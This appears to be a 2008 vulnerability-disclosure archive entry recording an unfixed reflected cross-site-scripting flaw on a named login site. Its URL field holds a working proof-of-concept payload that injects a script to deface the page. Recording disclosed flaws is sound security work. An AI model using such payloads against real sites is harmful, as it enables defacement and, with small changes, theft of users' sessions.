Security researcher yehg.co.nr, has submitted on 01/02/2008 a cross-site-scripting (XSS) vulnerability affecting login.sdpcore.com, which at the time of submission ranked 100640 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/03/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/02/2008 |
Date published: 15/03/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: yehg.co.nr |
Domain: login.sdpcore.com |
Category: XSS |
Pagerank: 100640 |
URL: https://login.sdpcore.com/RALogin/login?CALL_BACK=http%3A%2F%2Fwww.pfingo.com%2Fpf%2Fportal%2Fcontro l%2Floggedinhome&SERVER_URL=https%3A%2F%2Flogin.sdpcore.com%2Feam%2Flogin.redirect.js%3Fdefault_rls_ code%3Dsdp&ERROR_URL=%2FVCRLS%2Ferror&VCID=sdp&CALL_BACK_ERR=https%3A%2F%2Fgoogle.comlogin.sdpcore.c om%2FRALogin%2Flogin_error%22%3E%3Cscript%3Edocument.body.innerHTML='%3Ch1%3EHacked%20by%20burmese%2 0hackers%20-%20%3Ca%20href=%22http://yehg.co.nr%22%3Eyehg.co.nr%3C/a%3E%3C/h1%3E';%3C/script%3E&UID= |
Click here to view the mirror
|
|
|